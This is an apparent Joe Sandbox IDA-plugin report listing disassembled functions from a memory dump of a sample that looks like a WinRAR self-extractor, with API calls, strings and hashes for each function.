Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 40cd6d811253d6926dd092237c57edabd56706736929246b0a85fa15271114ad
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0511387724109183D614EA2DD8B45B6A3D5EBC5321B2D837AC04ECB754D3239B44DF00

Function 00177B5C Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00177B9C

Part of subcall function 00174C1E: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00174C31

Part of subcall function 0017BBC8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00177BB8,?,00000000,00000000,?,?,?,00177BB8,?,?,00000050), ref: 0017BBE5

SetDlgItemTextW.USER32(?,001AE16C,?), ref: 00177C16
GetWindowRect.USER32(?,?), ref: 00177C4C
GetClientRect.USER32(?,?), ref: 00177C58
GetWindowLongW.USER32(?,000000F0), ref: 00177D03
GetWindowRect.USER32(?,?), ref: 00177D33
SetWindowTextW.USER32(?,?), ref: 00177D62
GetSystemMetrics.USER32(00000008), ref: 00177D6A
GetWindow.USER32(?,00000005), ref: 00177D75
GetWindowRect.USER32(00000000,?), ref: 00177DA5
GetWindow.USER32(00000000,00000002), ref: 00177E17

Strings

d, xrefs: 00177C78
$%s:, xrefs: 00177B85
CAPTION, xrefs: 00177D4A

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_swprintf
String ID: $%s:$CAPTION$d
API String ID: 3208934588-2512411981
Opcode ID: 7b005629bb5291168df2e57ea62f74f6208bfb6b8c3286b7619ffc214f993428
Instruction ID: efe02685b67330a18e6e906b00aef15085964cbc8132109973c83dff49e0d4f2
Opcode Fuzzy Hash: 7b005629bb5291168df2e57ea62f74f6208bfb6b8c3286b7619ffc214f993428
Instruction Fuzzy Hash: CB818BB2508301AFD714DF68CD89E6FBBF9EB88714F04491DF98993291D730E8498B92

Function 0018CBE7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(001CB878,00000FA0,?,?,0018CBC5), ref: 0018CBF3
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0018CBC5), ref: 0018CBFE
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0018CBC5), ref: 0018CC0F
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0018CC21
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0018CC2F
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0018CBC5), ref: 0018CC52
DeleteCriticalSection.KERNEL32(001CB878,00000007,?,?,0018CBC5), ref: 0018CC75
CloseHandle.KERNEL32(00000000,?,?,0018CBC5), ref: 0018CC85

Strings

kernel32.dll, xrefs: 0018CC0A
WakeAllConditionVariable, xrefs: 0018CC27
SleepConditionVariableCS, xrefs: 0018CC1B
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0018CBF9

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: d4002e638889542ba69431dd2f935080ebfbe163743708c936a399c4fd122b01
Instruction ID: 6a39d69dad0b37e591f1fe6616d03503b7a70e90c9ad9431f696aa0b8f9f9a3e
Opcode Fuzzy Hash: d4002e638889542ba69431dd2f935080ebfbe163743708c936a399c4fd122b01
Instruction Fuzzy Hash: 11018475A44A11ABDB212B79BD8AE277EACDB97B41F050115FD0DE3950DBB0C880CBB4

Function 00199EC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00199F06

Part of subcall function 00199AA1: _free.LIBCMT ref: 00199ABE
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199AD0
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199AE2
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199AF4
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B06
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B18
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B2A
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B3C
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B4E
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B60
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B72
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B84
Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B96

_free.LIBCMT ref: 00199EFB

Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C

_free.LIBCMT ref: 00199F1D
_free.LIBCMT ref: 00199F32
_free.LIBCMT ref: 00199F3D
_free.LIBCMT ref: 00199F5F
_free.LIBCMT ref: 00199F72
_free.LIBCMT ref: 00199F80
_free.LIBCMT ref: 00199F8B
_free.LIBCMT ref: 00199FC3
_free.LIBCMT ref: 00199FCA
_free.LIBCMT ref: 00199FE7
_free.LIBCMT ref: 00199FFF

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 02487f09a1b218c70e858891bb58f21064c49f55a89edc5437cc8f0b5b11f9dc
Instruction ID: 7cf8816d36138c3b320891bb8a48f766537fce90005927793d978d77d3ca480c
Opcode Fuzzy Hash: 02487f09a1b218c70e858891bb58f21064c49f55a89edc5437cc8f0b5b11f9dc
Instruction Fuzzy Hash: 263105327066059FEF21AB7DD845F5ABBE9AF20310F14446DF85AD7191EB75AC80CB20

Function 001849E2 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001849E9

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

_wcslen.LIBCMT ref: 00184A4B
_wcslen.LIBCMT ref: 00184A6A
_wcslen.LIBCMT ref: 00184A86
GlobalAlloc.KERNEL32(00000040,?,00000000,001A34A8,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00184AFD

Strings

<html>, xrefs: 00184A2F
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00184A46, 00184A52
</html>, xrefs: 00184A80, 00184A85, 00184A8D
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00184A07

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _wcslen$AllocGlobalH_prolog3_
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 1478282658-1533471033
Opcode ID: 27e5fa315d4d7f7af51c6d89ced9f7620dac960a39eb24f64cbb937eeabdc338
Instruction ID: 967c09f3969b529bf6d8b32e57429edc43820b2b084281dc74d49227651fadc2
Opcode Fuzzy Hash: 27e5fa315d4d7f7af51c6d89ced9f7620dac960a39eb24f64cbb937eeabdc338
Instruction Fuzzy Hash: 54516D75A00219AFEB05EBA4CC46BEEBBB9EF65310F144019F505BB181DB709E85CBA4

Function 0018A6F6 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0018A724
GetClassNameW.USER32(00000000,?,00000080), ref: 0018A750

Part of subcall function 0017BF3C: CompareStringW.KERNEL32(00000400,00001001,B19080A7,000000FF,?,000000FF,001753ED,0000002E,-00000002,00000000,?,00000000,?,00000008,?,?), ref: 0017BF52

GetWindowLongW.USER32(00000000,000000F0), ref: 0018A76C
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0018A783
GetObjectW.GDI32(00000000,00000018,?), ref: 0018A797
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0018A7C0
DeleteObject.GDI32(00000000), ref: 0018A7C7
GetWindow.USER32(00000000,00000002), ref: 0018A7D0

Strings

STATIC, xrefs: 0018A756

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 509033bcec73005a5e280b50c48b6ad5fce57a92e6e30c222d42b839f3ee1613
Instruction ID: 3698aff7c537d350253b4f854ae514da6fb19cdcc23019c9f0a9f16e8598ef7a
Opcode Fuzzy Hash: 509033bcec73005a5e280b50c48b6ad5fce57a92e6e30c222d42b839f3ee1613
Instruction Fuzzy Hash: 86213772140714AFF3207B60CC4AFAF7BADAF69B00F440016FA05A6192DB358E014BE2

Function 00196671 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00196685

Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C

_free.LIBCMT ref: 00196691
_free.LIBCMT ref: 0019669C
_free.LIBCMT ref: 001966A7
_free.LIBCMT ref: 001966B2
_free.LIBCMT ref: 001966BD
_free.LIBCMT ref: 001966C8
_free.LIBCMT ref: 001966D3
_free.LIBCMT ref: 001966DE
_free.LIBCMT ref: 001966EC

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ef0d0712ac6b750d57bccfe18aba5e2f6d97136b812448b1777aa5d83e3fee6e
Instruction ID: 01ef7d9f71feb16bcea5b7207b93e704e7e6c6b8e34e3b7ac83a4433943a1947
Opcode Fuzzy Hash: ef0d0712ac6b750d57bccfe18aba5e2f6d97136b812448b1777aa5d83e3fee6e
Instruction Fuzzy Hash: FD118676712148BFCF01EF54C942CD93BA5EF14350B9141A5BA098F222EB32DE51DFA0

Function 001902A4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 001903C3
___TypeMatch.LIBVCRUNTIME ref: 001904D1
_UnwindNestedFrames.LIBCMT ref: 00190623
CallUnexpected.LIBVCRUNTIME ref: 0019063E
_abort.LIBCMT ref: 00190643

Strings

csm, xrefs: 0019034E
csm, xrefs: 001903FA
csm, xrefs: 001902E1

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: a8690662c0b474b51d44f137cda4dd29b88c1addd881e67624602f76079ef28a
Instruction ID: d8e4d6bd11d4917cd58d2da3c8b6b68aaaecd7335adeb043ac562d02e9d31ace
Opcode Fuzzy Hash: a8690662c0b474b51d44f137cda4dd29b88c1addd881e67624602f76079ef28a
Instruction Fuzzy Hash: 84B16D71800209EFDF16DFA4C8819AEBBB5FF68310F15416AF915AB212D731EA61CF91

Function 0018514E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00185155
_wcslen.LIBCMT ref: 00185287

Strings

, xrefs: 0018527A, 00185286, 0018528E
<br>, xrefs: 00185269
</p>, xrefs: 00185253
<style>, xrefs: 00185298
</style>, xrefs: 001852B5

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_wcslen
String ID: $</p>$</style>$<br>$<style>
API String ID: 3746244732-3393513139
Opcode ID: b3ca2a23bbcc7a085325bf1f2f14b22af1ba429b05bb78d298cf3cfee3c31e04
Instruction ID: 0e44d9f034692c161001d2b96b439b01033a20beb8aec390f3aedf29f4760e94
Opcode Fuzzy Hash: b3ca2a23bbcc7a085325bf1f2f14b22af1ba429b05bb78d298cf3cfee3c31e04
Instruction Fuzzy Hash: 8F513829B40B12D6DF34BA1488617BA73B3EF25751FA44019FCC5AB280EF659F81CB90

Function 00187630 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2

EndDialog.USER32(?,00000001), ref: 00187680
SendMessageW.USER32(?,00000080,00000001,00030479), ref: 001876A7
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050EC9), ref: 001876C0
GetDlgItem.USER32(?,00000065), ref: 001876DC
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001876F0
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00187706

Strings

LICENSEDLG, xrefs: 00187644

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: MessageSend$Item$DialogTextWindow
String ID: LICENSEDLG
API String ID: 3077722735-2177901306
Opcode ID: ee922ad9f485e1545350fc5b692cc49ed3e96e9338f88d195ee0cc7274288dac
Instruction ID: efef5f54424b89bf52649e975c5235b92c1ffc44ec1f9049f6f8e0cd1da3a0a2
Opcode Fuzzy Hash: ee922ad9f485e1545350fc5b692cc49ed3e96e9338f88d195ee0cc7274288dac
Instruction Fuzzy Hash: CE210631648604BFE2116F2ADC0DE7B3F6CEB67785F254404F204925E1D762DE818BB5

Function 001758D4 Relevance: 10.7, APIs: 7, Instructions: 197COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001758DB
GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00175910
GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 0017594F
_wcslen.LIBCMT ref: 0017595F
GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 001759DC
GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00175A1E
_wcslen.LIBCMT ref: 00175A2E

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FullNamePath$_wcslen$H_prolog3_
String ID:
API String ID: 840513527-0
Opcode ID: e601fcc26aace754919f77732a58cb19b905f2c1e13f258d799a201befe59907
Instruction ID: e2b4a22519a01e0a3ae194d183202ffb62cb770b6cfd5f6fa8d4769e79c8eff3
Opcode Fuzzy Hash: e601fcc26aace754919f77732a58cb19b905f2c1e13f258d799a201befe59907
Instruction Fuzzy Hash: 5E616E71E00609ABDF14DFA8D985AEEB7BAAF98710F14821AF419F7251DB74D940CB20

Function 0019C992 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0019D107,?,00000000,?,00000000,00000000), ref: 0019C9D4
__fassign.LIBCMT ref: 0019CA4F
__fassign.LIBCMT ref: 0019CA6A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0019CA90
WriteFile.KERNEL32(?,?,00000000,0019D107,00000000,?,?,?,?,?,?,?,?,?,0019D107,?), ref: 0019CAAF
WriteFile.KERNEL32(?,?,00000001,0019D107,00000000,?,?,?,?,?,?,?,?,?,0019D107,?), ref: 0019CAE8

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 14cfe3d0bbdbdbe85adbfc033789e1383f0b36b595003ce4bb2da6c841baf0c6
Instruction ID: 6d60be8f47674908b2e0ad8c8f71f77563cf7ce174f104e4005ed8dbd2f9204d
Opcode Fuzzy Hash: 14cfe3d0bbdbdbe85adbfc033789e1383f0b36b595003ce4bb2da6c841baf0c6
Instruction Fuzzy Hash: 1C51B6719002499FDF14CFA8DC95AEEBBF8EF09350F14411AE996E7292E730D941CBA1

Function 00185335 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0018533C
ShowWindow.USER32(?,00000000,00000038), ref: 00185364
GetWindowRect.USER32(?,?), ref: 001853A8
ShowWindow.USER32(?,00000005,?,00000000), ref: 00185443
ShowWindow.USER32(00000000,00000005), ref: 00185464

Strings

RarHtmlClassName, xrefs: 00185404

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Window$Show$H_prolog3_Rect
String ID: RarHtmlClassName
API String ID: 950582801-1658105358
Opcode ID: 25f93fca65963eddec0062587a785c29ba8fe3e1c32363cdd440f6151112e815
Instruction ID: 7bb8942d7d2e0e64a47f8e813ac5b88cfb0ecff7e1dd189acd51bcb6a355ef0b
Opcode Fuzzy Hash: 25f93fca65963eddec0062587a785c29ba8fe3e1c32363cdd440f6151112e815
Instruction Fuzzy Hash: 44412871900204EFDF11AFA4D989AAE7FB9FF48701F148155F908AA156DB70DE81CFA4

Function 00199C44 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00199C08: _free.LIBCMT ref: 00199C31

_free.LIBCMT ref: 00199C92

Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C

_free.LIBCMT ref: 00199C9D
_free.LIBCMT ref: 00199CA8
_free.LIBCMT ref: 00199CFC
_free.LIBCMT ref: 00199D07
_free.LIBCMT ref: 00199D12
_free.LIBCMT ref: 00199D1D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b35873524a760c03ab9487437f634a877bcf59d48e38088abdb566b69e001564
Instruction ID: 90be6bdd4aa2e5918276285cb82548c90b494fbe9f47d03cb0dd1b02c4f3376b
Opcode Fuzzy Hash: b35873524a760c03ab9487437f634a877bcf59d48e38088abdb566b69e001564
Instruction Fuzzy Hash: A2112171643B04AAEE60B7B4CC47FCB77DC9F25700F408D29B69AF6052EB66B5058690

Function 0018BB68 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0018BBE3,0018BB46,0018BDE7), ref: 0018BB7F
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0018BB95
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0018BBAA

Strings

AcquireSRWLockExclusive, xrefs: 0018BB8F
ReleaseSRWLockExclusive, xrefs: 0018BB9F
KERNEL32.DLL, xrefs: 0018BB7A

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
